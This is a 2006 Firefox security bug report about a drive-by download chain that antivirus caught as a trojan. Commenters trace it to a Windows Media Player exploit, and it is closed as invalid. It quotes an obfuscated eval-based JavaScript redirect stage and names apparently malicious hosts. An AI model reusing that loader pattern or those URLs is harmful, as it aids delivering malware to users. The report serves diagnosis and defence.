Closed
Bug 350457
Opened 19 years ago
Closed 19 years ago
Security hole, allows redirect to malicious .com file
Categories
(Firefox :: Security, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: igitur, Unassigned)
References
()
Details
(Whiteboard: [sg:investigate])
Attachments
(1 file)
30.77 KB,
application/zip
|
Details |
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Please don't follow the link if you don't have decent anti-virus software. F-Prot found the virus that Firefox let through.
Using fiddler I found that the above link does a serious of redirects using obfuscated javascript (too complicated for me to understand).
The last redirect is with this code:
<script >YlSlzNpIGOj=new Function("REfIM","ISTPNJkDxKeaEsf='';for(gKFP=0;REfIM.length>gKFP;gKFP+=2)ISTPNJkDxKeaEsf+=String.fromCharCode(parseInt(REfIM.substr(gKFP,2),16)^195);return ISTPNJkDxKeaEsf");eval(YlSlzNpIGOj("aaa5ebada2b5aaa4a2b7acb1edb3afa2b7a5acb1aefefee494aaadf0f1e4eaafaca0a2b7aaacadedabb1a6a5fee4b4b4b4eda4acaca4afa6eda0acaee4"))</script >
That redirects to a .com file that my PC tries to execute... and F-Prot luckily prevented that.
F-Prot gives this message:
Malicious code found in file C:\DOCUMENTS AND SETTINGS\E910102\LOCAL SETTINGS\TEMP\NPNEMB8I.COM.
Infection: Trojan.Win32.Obfuscated.a
Action: The file was deleted.
Reproducible: Always
Steps to Reproduce:
1. Follow the link (be careful)
Comment 1•19 years ago
|
||
What is the location of that .com file?
I don't get a download dialog.
I see that page contains an iframe with this location
view-source:http://www.installare.net/e/ads.php?b=788
That code is filling all available memory I have on my computer.
When I open that page locally, my McAfee virusscanner begins to complain about the Exploit-IframeBO!shellcode virus.
This is mentioned here: http://vil.nai.com/vil/datreadme.aspx?seldatfiles=4405
From http://gathering.tweakers.net/forum/list_messages/978944 I get the information this is: http://secunia.com/advisories/12959/
which is an IE exploit.
Comment 2•19 years ago
|
||
Are you sure Firefox tried to *execute* the .com file? Many virus scanners complain if a malicious file is simply downloaded, e.g. to the cache or download directory.
Reporter | ||
Comment 3•19 years ago
|
||
(In reply to comment #2)
> Are you sure Firefox tried to *execute* the .com file? Many virus scanners
> complain if a malicious file is simply downloaded, e.g. to the cache or
> download directory.
>
Jesse, true, I can't confirm that my PC actually tried to execute the file or just downloaded it. Either way... i'm not comfortable having that code on my PC, and if we can get Firefox not to download it at all, it would be great.
Martijn, I'll attach the full HTTP sessions tomorrow to illustrate all the redirects, including the final .com file.
Reporter | ||
Comment 4•19 years ago
|
||
Comment 5•19 years ago
|
||
Which is www.google.com?
I went to http://1.mp3liede.org/c33c5def/50311/1/www.google.com but that returns 404 to me.
Reporter | ||
Comment 6•19 years ago
|
||
The URL is
http://td8eau9td.com/c33c5def/50311/1/www.google.com
The previous redirects should've taken you to td8eau9td.com.
It's possible that the td8eau9td, c33c5def and 50311 were randomly generated and deleted and that just it's our cache that still persists them. For another person they might be different.
Comment 7•19 years ago
|
||
What version of Windows Media Player do you have? I haven't yet de-obfuscated this yet, but the two times I've seen this style of obfuscation (using in part the length of the deobfuscating function as a key) it used the MS06-006 Windows Media Player vulnerability to download its attack code (which was a different payload, but those change all the time so that means nothing).
I notice that one of the files it tries to get is called "nt_wmp.htm" which reinforces my suspicion, but I'll know for sure when I decode it.
In the meanwhile check with windows update and make sure you've got the latest everything, or run the MS "Baseline Security Analyzer" which you can get from microsoft.com and will check to make sure you've applied all their patches.
http://www.microsoft.com/technet/security/bulletin/ms06-006.mspx (contains link to the Baseline Security Analyzer, too).
This is, at this point, just a guess. If someone beats me to the de-obfuscation, what you're looking for is some script that preps memory with repeats of the attack code, and then an <embed> or <object> with a really, really long URL.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [sg:investigate]
Reporter | ||
Comment 8•19 years ago
|
||
Before installing security patches, my WMP version is 10.00.00.4036
After installing security patches, my WMP version is STILL 10.00.00.4036, but the redirects to the "virus" don't occur anymore.
So thank you, seems this was a Microsoft error. Never thought it could affect Firefox.
Issue closed?
Reporter | ||
Comment 9•19 years ago
|
||
Hey guys...
Must I close this issue?
It was my first ever bug reports, so still new to the procedure.
Reporter | ||
Updated•19 years ago
|
Status: NEW → RESOLVED
Closed: 19 years ago
Resolution: --- → INVALID
Updated•18 years ago
|
Group: security
You need to log in
before you can comment on or make changes to this bug.
Description
•